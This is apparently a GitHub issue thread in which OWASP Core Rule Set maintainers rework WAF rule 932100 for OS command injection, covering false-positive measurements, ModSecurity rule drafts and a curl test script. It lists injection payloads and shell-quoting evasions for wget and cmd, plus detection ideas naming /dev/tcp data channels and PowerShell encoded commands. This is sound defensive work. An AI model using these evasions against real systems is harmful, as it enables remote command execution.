Improve System Command Injection rule (932100)

Rule 932100 seems to produce a lot of false positives as well as false negatives. I'll copy some comments from the mailing list so we can revisit this as necessary. If I missed or misrepresented some comments, please add to this issue.

Summary of problems:

false positives due to common words, however some words are essential to attack detection
false negatives due to regexp
false negatives due to missing commands like passwd

Christian said: This rule is controversial for different reasons than the one in the previous post. It was a simple regex in 2.2.X. For 3.0.0 it has been enriched with a data file.

In a response to my blogpost Chaim conceded the 3.0.0 version is still plagued by a lot of false positives. Obviously so, if you look at the commands. After all, unix commands are close to natural English for a good reason.

Now Franziska (collaborating on the paranoia mode) and I wonder if it would not make sense to split os-commands.data into two or more files. The commands with few false positives would remain in the standard file, commands generating lots of false positives could then be moved into os-commands-paranoia.data and be referenced in a separate rule copying the behaviour of the standard rule.

My reaction: I like the idea of splitting the file. Overall I'm not satisfied with this new rule yet. I think the regexp needs some love too. I agree some of the words in os-commands.data seem rather paranoid. Words like "choice", "help", "now" seem of low value and are common in natural text. Also, the large number of Unix-only environments could skip Windows-related commands. It's hard for users to modify these lists as you'd have to hack the CRS, and these huge collections are hard to maintain anyhow, so I agree we need granularity.

The rule has some regexp magic to prevent false positives, but the balance is not a complete success in my opinion. For instance, the following URLs don't trigger in CRSv3: http://vuln/?cmd=wget%20http://example.com/blah.txt http://vuln/?cmd=sh%20blah.txt

So it's not as strong as you would want either to prevent some common RCE. Something like http://vuln/?cmd=Wget%20http://example.com/;%20ecHo does trigger it.

Christian produced some statistics and a possible resolution:

1 : open
1 : replace
1 : set
1 : sort
1 : type
1 : where
2 : cat
2 : now
2 : sed
2 : tree
2 : which
3 : color
3 : git
3 : head
3 : history
3 : net
5 : diff
5 : format
5 : time
6 : echo
9 : ver
11 : choice
11 : share
15 : for
16 : rm
21 : arch
22 : start
22 : top
24 : ren
27 : local
29 : query
32 : nc
40 : dir
41 : sh
42 : su
45 : sc
56 : cmd

So maybe we face 3 groups of commands:

entries without many FPs -> PL1
entries with many FPs, but not very dangerous -> PL2 or higher
entries with many FPs, but very dangerous -> separate regex rule in PL1 which deals with the FPs
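
As a rough illustration of the three groups, here is a minimal Python sketch. It reads the numbers in the list above as false-positive hit counts, which is an assumption; the threshold and the set of "very dangerous" commands are hypothetical and were not proposed in the thread.

```python
# A few rows copied from the statistics above (command -> count).
fp_hits = {"cat": 2, "echo": 6, "rm": 16, "nc": 32, "dir": 40, "sh": 41, "cmd": 56}

# Hypothetical values, for illustration only.
MANY_FPS = 10                          # assumed cut-off for "many FPs"
DANGEROUS = {"rm", "nc", "sh", "cmd"}  # assumed "very dangerous" commands

def assign_group(command: str, hits: int) -> str:
    """Map one command to one of the three groups discussed above."""
    if hits < MANY_FPS:
        return "PL1"
    if command in DANGEROUS:
        return "PL1 separate regex rule"
    return "PL2 or higher"

groups = {cmd: assign_group(cmd, n) for cmd, n in fp_hits.items()}
for cmd, group in groups.items():
    print(f"{cmd:5} {fp_hits[cmd]:3}  {group}")
```

The real decision would of course need a human judgement on how dangerous each command is; the sketch only shows the shape of the rule.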

Walter addition: I'm also still interested in splitting off the Windows batch commands to a separate rule. We could tag it platform-windows, this will surely cut down on false positives.

I've started looking at the RCE rule. First, let's describe the current rule. The rule first uses a words file with pmf operator, and in a chain does some regexp magic to ensure magic characters are found.

The chain is aimed at the case of an application sending untrusted input unescaped to a shell as part of another argument (command injection). For instance it will block a payload of pic.jpg;wget ... and pic.jpg|wget .... It seems decent at blocking that, but due to use of the pmf operator, and our being unable to reuse the pmf matches in an expression, the regexp will be heavy-handed. Just the use of a word in the list, in combination with some special characters, and you have a rule hit.

False positives

Franziska and Christian have given some input about false positives, so I've done an experiment on this. I've taken a public dataset of 126k Reddit comments, and fed all of them to CRS3 at paranoia level 1. I assume almost all of these comments should be negatives, although surely some will discuss code or SQL, but that's likely a small part. Here is the distribution of the resulting CRS3 scores:

[Image: comments-waf-scores]

I posted 126k comments and would hope for almost all of them to return a score 0. That's not the case. Around 81k comments have score 0, 43k comments have score 5, 2k comments have score 10, 211 comments have score 15, 16 comments have score 20, and 9 comments have a higher score. So, around 35% of the posted forum comments yield a false positive result. :(
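
The percentage can be re-derived from the rounded counts quoted above. This is only a small arithmetic sketch in Python; since the "k" figures are rounded, the result is approximate.

```python
# Comments per anomaly score, using the rounded figures from the text.
score_counts = {0: 81_000, 5: 43_000, 10: 2_000, 15: 211, 20: 16}
higher_than_20 = 9

total = sum(score_counts.values()) + higher_than_20
flagged = total - score_counts[0]   # every comment with a non-zero score
fp_rate = flagged / total

print(f"{flagged} of {total} comments flagged ({fp_rate:.1%})")
```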

This is a bit sad, but now comes the good news. Here is the table of the 5 rules producing the most hits for the reddit dataset:

Rule ID	Hits	Explanation
`932100`	44203	Remote Command Execution (RCE) Attempt
`942250`	2142	Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections
`942230`	224	Detects conditional SQL injection attempts
`921110`	126	HTTP Request Smuggling Attack
`921160`	95	HTTP Header Injection Attack via payload (CR/LF and header-name detected)

It turns out that almost all of the rule hits (over 44k) are due to this RCE rule!

That in itself is great news. It means that by improving this rule, we have an amazing potential for reducing the rate of false positives.
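
To put a number on "almost all", here is a short Python sketch that computes the share of rule 932100 among the five rules in the table. Note that it only covers those five rules, not every rule that fired.

```python
# Hits per rule ID, copied from the table above.
top_rule_hits = {
    "932100": 44203,
    "942250": 2142,
    "942230": 224,
    "921110": 126,
    "921160": 95,
}

total_top5 = sum(top_rule_hits.values())
share_932100 = top_rule_hits["932100"] / total_top5

print(f"932100 accounts for {share_932100:.1%} of the top-5 hits")
```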

But it also means that improving the rule is absolutely a must for 3.0.0. It's a new category of false positives introduced, which was not in CRS2.

False negatives

As for the specificity: I had complained a bit about some uncaught examples like a payload of wget http://foo. I now realize that CRS3 simply does not deal (yet) with the case of a complete parameter passed to a shell directly (no injection into another command string, but a direct RCE vulnerability). The old CRS2 rule (950907) had a regexp so it could do this. The current chain does not deal with this case, probably as it would have made the FP rate even higher.

The os-commands.data file contains 301 words, many of which are commonly found in English texts, like: bash call cat copy del dir echo exec head history kill less lynx more net type... The situation is really different than with the PHP function names. Many shell commands are short and common. Some of these words are actually important to block however. Especially the Windows shell has a lot of normal English words as commands.

The command id is often used for reconnaissance, but is currently not included in the data file. That was probably done because of false positives, but it's a shame since this is often used by scanners. If we make our detection more precise, maybe we can bring it back.

The case of a matched string at the start of the payload might also require more attention. It's debatable if we want to block a payload like ^cat .... So maybe we should be somewhat more restrictive in the case of a match at the start of the string. Blocking wget ... or sh ... is more defensible. In any case, this must be covered with tests carefully.

The top priority is to drastically lower FP (ideally by 90% or more), but at the same time I hope to catch more injections and if possible some direct RCE.

Possible strategies

1. Partition the data file into "must have" terms for PL1, "nice to have" terms for PL2, and "unimportant/hopeless".
2. Ensure that a word is only matched if it appears in a dangerous position: at the start of the payload, or after a command separator like ; and |. This would use an approach like in CRS2 950907 possibly updated with the current chain regexp.
3. Separate the Windows shell commands into a separate rule, tagged with platform-windows. It is my estimation that this will remove 50% or more of FP on Unix systems.
4. For Unix commands, use case-sensitive match. cat is a command but Cat should not match. This could certainly lower FP, since in natural text, caps are commonly used at the start of payloads or after a separator character.
5. Consider if we can include id in a list without too much FP. If not, then at least add /usr/bin/id.
6. Ensure that we also accept commands prefixed with a path (e.g. /bin/sh, C:\Windows\system32\cmd.exe)
7. If significant FP remains from words at the start of the payload, restrict the list of words checked at the start of a payload.
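
The "dangerous position" and case-sensitivity ideas from the list above can be sketched in a few lines of Python. This is a toy model, not a proposed rule: the three-word list and the separator set are assumptions, and real ModSecurity regexes would be written in PCRE rather than Python.

```python
import re

# Hypothetical short word list; a real rule would draw on os-commands.data.
COMMANDS = ["wget", "cat", "sh"]

# Assumed separator set (; | & and newline); the thread lists more markers.
DANGEROUS_POSITION = re.compile(
    r"(?:^|[;|&\n])\s*(?:" + "|".join(re.escape(c) for c in COMMANDS) + r")\b"
)

def in_dangerous_position(payload: str) -> bool:
    """True if a listed command starts the payload or follows a separator."""
    # No re.IGNORECASE on purpose: "cat" matches, "Cat" does not.
    return DANGEROUS_POSITION.search(payload) is not None

for payload in ["pic.jpg;wget http://example.com/", "wget http://foo",
                "Cat Index Of Australia", "I downloaded it with wget"]:
    print(in_dangerous_position(payload), payload)
```

A word in the middle of ordinary text no longer matches, which is where most of the forum-comment hits would be expected to come from.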

I'll sleep on it, but I think going back to a regexp is pretty much a must, since it would enable a lot of strategies, and I don't have too much hope for just partitioning the word files. With a pmf rule, I'm afraid you still can't post a regular internet comment using CRS.

The surgical precision of a regexp might allow us to include even 300 terms with reasonably small FP. Maybe we can get to a good FP rate with just one rule, if the regexp is precise enough. If this is not satisfactory, it's not much more work to partition the items and send the less important ones to PL2 or higher.

I wouldn't mind splitting off the Windows words either as it would benefit my situation. I expect a lot of FP will always come from these words. If Unix users can disable that rule in their configs, their security won't be impacted. If we don't split for OS, they don't have that control, and many of them may then remove the whole list.

Wow. This is nice. My data confirms that most FPs left in CRS3 PL1 are due to this rule. I am glad you are tackling it.

Where did you get that 126K reddit file from? Mind sharing it? I have meanwhile found https://www.reddit.com/r/datasets/comments/3bxlg7/i_have_every_publicly_available_reddit_comment/ which seems like an ultimate answer to my regular "we-need-a-dataset-of-vanilla-traffic-to-calibrate-the-ruleset" remark.

I agree with your conclusion we need to go back to a regex. Your handling of the PHP function calls has proven that we can live with the performance and that we have a transparent and repeatable way of generating the regexes. I'd rather not include the less dangerous terms in the PL1 rule. For reasons of performance (why burn cycles in default install on something we consider mostly harmless) and complexity.

Possible strategies:
1. Agreed. I would not mind running up to PL3 and PL4 with the rules. As mentioned elsewhere, we have a few dozen PL2 rules, but little in PL3 and PL4. Also: maybe we want to have the same list of commands in multiple rules. A relaxed regex at a lower PL and a stricter one at a higher PL.
2. Yep.
3. I do not like separation by OS or by application, for the simple reason that big services / enterprises do not know the backends very well and might disable certain categories (or, if default-off, forget to enable them). Can you give a few examples of payloads targeting Windows commands? However, your claim that Windows commands lead to a ton of Unix FPs is probably stronger than my argument. Working with the cleaned up tags makes it fairly simple. So I agree.
4. I'd hate to do a case-sensitive match only to have the backend lowercase the input before it attempts to execute the code. Be careful here. Or use an additional case-insensitive rule at a higher PL. See (1).
5. id is hard. \b word boundaries in regexes might come to our rescue, though.
6. Yes. Can we hardcode these? Or at least hardcode the static ones and use regexes for /usr/local/bin/anything and /opt/anything/bin?
7. I do not understand this. Please elaborate.

@dune73 Thanks for your comments!

I found the dataset via the same thread I think. I didn't feel like filling up my disk so I picked this sample set of just Oct 2007 instead. It's nice in JSON, just skip all comments with body [deleted].
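
For anyone who wants to repeat the experiment, here is a minimal Python sketch of the filtering step. It assumes the sample is stored as one JSON object per line with a "body" field; that layout is an assumption about the file, so adjust it to whatever the download actually looks like.

```python
import json
from typing import Iterable, Iterator

def comment_bodies(lines: Iterable[str]) -> Iterator[str]:
    """Yield comment bodies, skipping blank lines and deleted comments."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        body = json.loads(line).get("body", "")
        if body and body != "[deleted]":
            yield body

# Tiny in-memory sample standing in for the real file.
sample = [
    '{"body": "I like my cat"}',
    '{"body": "[deleted]"}',
    '{"body": "Use wget to fetch it"}',
]
bodies = list(comment_bodies(sample))
print(bodies)
```

Each remaining body can then be posted to a test server running CRS, for example with a curl loop like the ones further down in this thread.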

1. I think realistically we'll likely end up using multiple paranoia levels, perhaps even up to PL4. For maintenance reasons, I strongly prefer not setting up a large collection of rules just for this exploit class. But the FP rate of CRS3 probably requires something somewhat complex. Not sure if we'll need multiple versions of the regexp. Hopefully not... but we could do it.
2. Yep. See below for some thoughts on possible patterns to detect.
3. Well, the only thing we need to do is create separate rule(s) for Windows commands. If the user does not care about platforms, there is no harm. Both Unix and Windows rules will execute by default. But the platform separation is an automatic safety valve. If a Unix user gets annoyed by Windows FP, and they whitelist a Windows rule id, its sibling Unix rule is still kicking. User stays protected. Some examples of some Windows-only commands: cmd, compact, copy, del, dir, erase, explorer, format... Another aspect is that the Windows and Unix shell have separate semantics (case sensitivity) or escaping which we might exploit to lower FP. But treating Windows commands separately might double the number of rules to maintain, which is obviously a negative.
4. I'd prefer not doing a case sensitive match, but if FP remains high and we can push it down, I'm open to the idea. I think the case of an application doing a lowercase transform on the shell string is probably rare, but it'd be nice of us to catch it, at the cost of a bit more maintenance. If we go this route, the case-insensitive sibling sounds like a good addition for PL2 or PL3, depending on FP rate.
5. I also found that in the past some very short terms have been removed from the list. If id and friends are untenable in the base level words, we could scoop some of them up at a higher paranoia level, perhaps PL3-4.
6. Could be a regexp, hopefully reasonably simple. I'll paste what I've already thought about at the bottom, but I'll dig into it deeper in the coming weeks. If you have experience with OS command injection, especially on Windows, please add to it.
7. I meant, if there is still too much FP at the end of this project, we can verify in which parts of the strings the FPs are occurring. Blocking a substring like && cat index.php is quite different than blocking Cat Index Of Australia. So, it could be an option to reduce FP by treating the latter case differently. Maybe by restricting its word list, or as a last resort measure, maybe by checking this case in a higher paranoia level only.

Haha! Following your initial post, I searched around and ended up with the sample set of just Oct 2007. [deleted] looks like a false positive we should tackle separately.

But this all makes a lot of sense.

Pattern ideas

I guess \bwget\b is our friend. Ideally in combination with t:cmdLine . The problem is this transformation removes backslashes which means we would end up with foobarwget and \bwget\b thus no longer matching. Without the transformation, I do not see how we could catch the last two of your examples.

@dune73 Wow, t:cmdLine sounds great! I wonder why it's not implemented in rule 932100 right now. I hope it cures some evasions :) Definitely going to try it.

I did some testing. It seems that \bwget\b combined with t:lowercase, t:cmdLine and multimatch does the trick.

Here is my slightly aggravated test attack script:

curl --silent -o /dev/null -w "%{http_code}\n" -d "a=^wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=; wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=| wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=&& wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=|| wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\r\n wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\`wget ...\`" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\$(wget ...)" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a='wget'" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\"wget\"" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=/usr/bin/wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=/usr/./bin/wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=C:\Bin\wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\\Foo\bar\wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=wget.exe" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=wget/h" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=WgEt" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\w\g\e\t" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a='w'\"g\"et" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\"w\"\g\e\t" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a='w'\"g\"\e\t"  http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=/usr/bin/\'w'\"g\"\e\t"  http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\\Foo\bar\'w'\"g\"\e\t"  http://localhost/index.html

The payloads "w"\g\e\t and 'w'"g"\e\t are actually functional in Linux. Paste them into the shell: wget is executed.

The following rule catches all of the above but the last one:

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bwget\b" \
        "msg:'Remote Command Execution (RCE) Attempt',\
        phase:request,\
        rev:'2',\
        ver:'OWASP_CRS/3.0.0',\
        maturity:'9',\
        accuracy:'8',\
        capture,\
        t:lowercase,\
        t:cmdLine,\
        multimatch,\
        ctl:auditLogParts=+E,\
        deny,\
        id:1000,\
        tag:'application-multi',\
        tag:'language-multi',\
        tag:'platform-multi',\
        tag:'attack-rce',\
        tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
        tag:'WASCTC/WASC-31',\
        tag:'OWASP_TOP_10/A1',\
        tag:'PCI/6.5.2',\
        logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
        severity:'CRITICAL'"

Without multimatch, two more of them slip through: as expected, lines 13 and 14 of the script (C:\Bin\wget and \\Foo\bar\wget).

The problem with the last one is the combination of quotes and backslash characters. t:cmdLine erases both of them, but we end up with foobarwget and \bwget\b no longer matches as explained above.
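
The effect is easy to reproduce outside ModSecurity. The following Python sketch uses a rough approximation of t:cmdLine based on its documented behaviour (delete \ " ' ^, delete whitespace before / and (, turn , and ; into spaces, collapse whitespace, lowercase); it is not the real implementation, and the function name is made up for this example.

```python
import re

_DELETE = str.maketrans("", "", "\\\"'^")   # the four characters cmdLine drops

def cmd_line(value: str) -> str:
    """Rough approximation of ModSecurity's t:cmdLine, for illustration only."""
    value = value.translate(_DELETE)
    value = re.sub(r"\s+(?=[/(])", "", value)   # whitespace before / and (
    value = re.sub(r"[,;]", " ", value)         # , and ; become a space
    value = re.sub(r"\s+", " ", value)          # collapse runs of whitespace
    return value.lower()

WGET = re.compile(r"\bwget\b")

evasion = r"""'w'"g"\e\t"""          # quoting evasion on its own
unc = r"""\\Foo\bar\'w'"g"\e\t"""    # the same evasion behind a UNC-style path

for payload in (evasion, unc):
    transformed = cmd_line(payload)
    print(f"{payload!r} -> {transformed!r} match={bool(WGET.search(transformed))}")
```

The first payload collapses to wget and matches. The second collapses to foobarwget, so the word boundary in front of wget is gone and the pattern misses it.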

That's an important observation. Indeed it would allow Windows attackers to pass C:\Windows\System32\cmd.exe, which t:cmdLine would transform to C:WindowsSystem32cmd.exe and so it goes undetected.

At the same time, the Windows shell is also sensitive to evasions via quotes. For instance, "c"md works in Windows too. To prevent this evasion we would still need t:cmdLine.

We might work around this particular Windows case of C:\Windows\System32\cmd.exe (and \\unc\paths) by regexping on its form specifically. This might not catch all, and might raise FP.

If we separate Unix and Windows command lists, we could add a trick for Windows only.

I've checked out the existing os-commands.data file, and added some 2-letter commands and some missing Unix commands. I've looked up the words in a dictionary and marked some for high FP risk already.

There are 448 entries (261 Unix, 268 Windows).

os-commands.csv.txt

Yes, it's very important to catch this.

I looked through the transformations once more and realised that t:normalizePathWin does an implicit \ to / conversion. This means that \\foo\bar\'w'\"g\"\e\t ends up as /foo/bar/'w'"g"/e/t. If we then apply t:cmdLine we get /foo/bar/wg/e/t. This is not particularly fancy, but we can catch it with optional slashes in the regex:

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bw\/?g\/?e\/?t\b" \
        "msg:'Remote Command Execution (RCE) Attempt',\
        phase:request,\
        rev:'2',\
        ver:'OWASP_CRS/3.0.0',\
        maturity:'9',\
        accuracy:'8',\
        capture,\
        t:lowercase,\
        t:normalizePathWin,\
        t:cmdLine,\
        multimatch,\
        ctl:auditLogParts=+E,\
        deny,\
        id:1000,\
        tag:'application-multi',\
        tag:'language-multi',\
        tag:'platform-multi',\
        tag:'attack-rce',\
        tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
        tag:'WASCTC/WASC-31',\
        tag:'OWASP_TOP_10/A1',\
        tag:'PCI/6.5.2',\
        logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
        severity:'CRITICAL'"

This rule now catches all the payloads in the series of curl calls above. Have not checked FPs so far, but I do not expect too many as forward slashes within words are rare AFAICS. Performance suffers of course, but multimatch is probably worse. The t:normalizePathWin transformation seems to be a bit cheaper than t:cmdLine. What is really annoying is the bad readability of the regex.
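
The transformation chain of this rule can be traced in Python. This is a simplified model under stated assumptions: normalize_path_win only covers the backslash-to-slash conversion and the collapsing of repeated slashes, cmd_line is a rough approximation of t:cmdLine, and both function names are invented for the example.

```python
import re

_DELETE = str.maketrans("", "", "\\\"'^")

def cmd_line(value: str) -> str:
    """Rough approximation of t:cmdLine (not the real implementation)."""
    value = value.translate(_DELETE)
    value = re.sub(r"\s+(?=[/(])", "", value)
    value = re.sub(r"[,;]", " ", value)
    return re.sub(r"\s+", " ", value).lower()

def normalize_path_win(value: str) -> str:
    """Simplified stand-in for t:normalizePathWin: backslashes become
    slashes and repeated slashes are collapsed; nothing else is modelled."""
    return re.sub(r"/+", "/", value.replace("\\", "/"))

WGET_SLASHES = re.compile(r"\bw/?g/?e/?t\b")

def transformed(payload: str) -> str:
    # Same order as in the rule: lowercase, normalizePathWin, cmdLine.
    return cmd_line(normalize_path_win(payload.lower()))

payload = r"""\\Foo\bar\'w'"g"\e\t"""
print(transformed(payload), bool(WGET_SLASHES.search(transformed(payload))))
```

Because the backslashes survive as slashes, the word boundary before w is preserved, which is what the optional slashes in the pattern rely on.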

I have noted that multimatch is no longer necessary to catch all these evasions. Not sure if we can remove it generally or if there are situations where we would still need it. Has to be tested.

Let's try and cover this as well. https://www.dropbox.com/s/om4yttb6nfix2hk/BSidesAth16_Perform_Effective_Command_Injection_Attacks_Like_Mr.Robot_Final.pdf He has a special slide on circumventing ModSec.

@dune73 Cool! This past week was super hectic, but I'm going to work on the rule today. I'll have a look at the presentation :)

Read it. Very inspiring work! I had heard of commix, but didn't know that it was the sqlmap for command injections. I've never considered this attack much (executing shells is for those without LSM and jails...) but there's a whole world out there. I've also read a bit more about bash and PowerShell and I installed a Windows VM. It's bad, it's bad. Did you know that in Windows you can do ^w^g^e^t? Did you know PowerShell added lots of aliases for Unix commands so that cp and rm also work? This is not helping, people.

With this depressing knowledge, I've expanded the patterns and os-commands data, and also thought about some other heuristics to add as possible rules. The whole cmd injection field is starting to look a bit like SQLi or XSS. We will end up with a suite of rules. I'm sure we won't detect everything under the sun. But we can try :)

Patterns

# command at start of payload (direct RCE)
wget ...

# markers that could precede a command in the middle of a string (command injection)
# we must watch out for \s* between marker and command
; wget ...
| wget ...
{ wget ... }      # Unix shell function
& wget ...        # Windows equivalent of ;
&& wget ...
|| wget ...
\n wget ...
$( wget ...)      # command substitution
$(( wget ...))    # arithmetic expansion
` wget ... `      # command substitution (probably sensitive to FP)
${wget ...}       # parameter expansion
<(wget ...)       # process substitution
>(wget ...)       # process substitution

# quoting and other command prefixes 
(wget ...)        # Unix
'wget ...'        # Unix/Windows
"wget ..."
/usr/bin/wget     # prefixed with path
/usr/./bin/wget   # path normalization
C:\Bin\wget       # Windows path (watch out for t:cmdLine!)
\\Foo\bar\wget    # Windows UNC path (watch out for t:cmdLine!)
FOO=1 wget        # setting variables

# postfix (probably okay by default if we use \b)
wget.exe          # Windows extension, also .com,.vbs
wget/h            # Windows switches can come straight after the command

# evasions
WgEt ...          # Windows is case-insensitive
\w\g\e\t ...      # Unix literal characters
^w^g^e^t ...      # Windows literal characters
'w'"g"et ...      # Unix string evasion
"w"get ...        # Windows string evasion

Separate rule ideas

Shell expansion: We could use a separate rule to detect shell expansions which may be present in command injection. This will allow us to catch them even if we miss the command.

$(...)       # command substitution
$((...))     # arithmetic expansion
${...}       # parameter expansion
<(...)       # process substitution
>(...)       # process substitution
`...`        # command substitution (FP risk)
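
A detector for the expansion forms listed above could look roughly like the following Python sketch. The pattern is an untuned illustration, not a proposed rule: it has not been run against any FP corpus, and the backtick branch in particular is expected to be noisy.

```python
import re

SHELL_EXPANSION = re.compile(
    r"""
      \$\(\(.*?\)\)   # $((...))        arithmetic expansion
    | \$\(.*?\)       # $(...)          command substitution
    | \$\{.*?\}       # ${...}          parameter expansion
    | [<>]\(.*?\)     # <(...), >(...)  process substitution
    | `[^`]+`         # `...`           command substitution (FP risk)
    """,
    re.VERBOSE | re.DOTALL,
)

def has_shell_expansion(payload: str) -> bool:
    """True if the payload contains one of the expansion forms above."""
    return SHELL_EXPANSION.search(payload) is not None

for payload in ["$(wget http://example.com/)", "echo `id`", "cat <(ls)",
                "the price is $5 (approx)"]:
    print(has_shell_expansion(payload), payload)
```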

Powershell options: Detect strings like: -EncodedCommand -ExecutionPolicy -InputFormat -NonInteractive -OutputFormat -PSConsoleFile. Some strings more FP-prone: -Command -File. Case insensitive.

Powershell cmdlets: Detect cmdlets available in Windows PowerShell. As always, case insensitive. Easy catch; most of them look resistant to FP, and we can throw out the ones that are not.

/dev: Detect /dev/fd/X, /dev/std{in|out|err}, /dev/tcp/host/port, /dev/udp/host/port. Just like PHP stream wrappers, they can be used to transfer code out-of-band, leak data, send spam, etc.
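
As a starting point for the /dev idea, here is a small Python sketch of a pattern for the four forms named above. It assumes the port may be a number or a service name and that the host contains no slash or whitespace; both are simplifications.

```python
import re

DEV_PATH = re.compile(
    r"/dev/(?:"
    r"fd/\d+"                      # /dev/fd/X
    r"|std(?:in|out|err)"          # /dev/stdin, /dev/stdout, /dev/stderr
    r"|(?:tcp|udp)/[^/\s]+/\w+"    # /dev/tcp/host/port, /dev/udp/host/port
    r")"
)

def uses_dev_path(payload: str) -> bool:
    """True if the payload references one of the /dev forms above."""
    return DEV_PATH.search(payload) is not None

for payload in ["bash -i >& /dev/tcp/10.0.0.1/4444 0>&1", "cat /dev/fd/3",
                "echo oops > /dev/stderr", "discard > /dev/null"]:
    print(uses_dev_path(payload), payload)
```

Ordinary paths such as /dev/null are deliberately left out, since they are common in harmless text about shell usage.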

Time based attacks: Detect Unix sleep \d+, Windows Start-Sleep (case insensitive). Could lead to FP.

Check headers: We might want to inspect some request headers like user-agent, referrer, host too.

os-commands.csv.txt

I made a proof of concept for the main rule without transformations. I wanted to have the coverage of the possible execution vectors, paths, prefixes etc out of the way. This example rule just detects wget, but that part can be replaced with an automatically assembled regexp. It detects Windows and Unix paths in one rule for now.

Dealing with shell quoting evasions (\w\g\e\t, ^w^g^e^t, "w"g'et') in a regexp is brutal. It will make it the most horrible regexp ever seen.

Maybe it can be simplified in some way. t:normalisePath gave me very strange results depending on other unrelated parts of the payload, so I'm scared of it. If t:cmdLine would correctly normalize all possible shell characters then that could be used to minimize those [\\\\'\"\^] sequences in the regexp. But if we have to match for \ and ^ between command letters anyway, we might as well skip t:cmdLine and have all the character handling in one place.

I don't know if we'll hit limits in ModSecurity's regexp engine when assembling the data files into the regexp, because if we are going to deal with these character evasions, the full regexp might get pretty \l\a\r\g\e...
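
To get a feeling for how such a pattern could be assembled from a word list, and how quickly it grows, here is a naive Python sketch. It simply interleaves an evasion character class between the letters of each word and joins the words with |. The word list is hypothetical, the sketch does not merge common prefixes, and it omits the prefix handling (separators, paths, quotes) of the rule that follows.

```python
import re

# Characters a Unix shell ignores inside a word in this context: \ ' "
UNIX_EVASION = r"""[\\'"]{0,2}"""

def evasion_tolerant(word: str, filler: str = UNIX_EVASION) -> str:
    """Interleave the filler class between the characters of a word."""
    return filler.join(re.escape(ch) for ch in word)

def assemble(words) -> "re.Pattern[str]":
    """Join all evasion-tolerant words into one alternation."""
    alternatives = "|".join(evasion_tolerant(w) for w in sorted(words))
    return re.compile(r"(?:" + alternatives + r")\b")

pattern = assemble(["wget", "curl", "lwp-download"])   # hypothetical list
print(len(pattern.pattern), "characters for 3 commands")

for payload in [r"\w\g\e\t", """'w'"g"et""", "c'u'rl", "widget"]:
    print(bool(pattern.search(payload)), payload)
```

Even three commands produce a pattern of a few hundred characters, so a few hundred commands would reach tens of thousands, which is why the question about engine limits is worth testing early.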

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(^|;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\()\s*({|\(|[\w\d_]+=.*)*\s*('|\")*([\w\d'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w\d '\"/\\\\]*\\\\)?['\"]*[\\\\'\"\^]?w[\\\\'\"\^]{0,2}g[\\\\'\"\^]{0,2}e[\\\\'\"\^]{0,2}t\b" \
    "msg:'Remote Command Execution (RCE) Attempt',\
    phase:request,\
    rev:'3',\
    ver:'OWASP_CRS/3.0.0',\
    maturity:'9',\
    accuracy:'8',\
    capture,\
    t:none,\
    ctl:auditLogParts=+E,\
    block,\
    id:932100,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    tag:'PCI/6.5.2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    severity:'CRITICAL',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.rce_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{matched_var_name}=%{tx.0}"

Reviews welcome. The regexp is based on catching the patterns in the comment above.

(Edit: removed very long test output from this post, see os-commands.txt for updated testcases.)

I think you can expect a letter from the International Academy of Regex Wizardry during the week. This is most impressive. Let alone the results.

I've pasted the assembled regexps into a Windows and a Unix rule.

To keep the regexp as small as possible, I've excluded Windows escape characters from the Unix rule, and vice versa.

# Unix commands
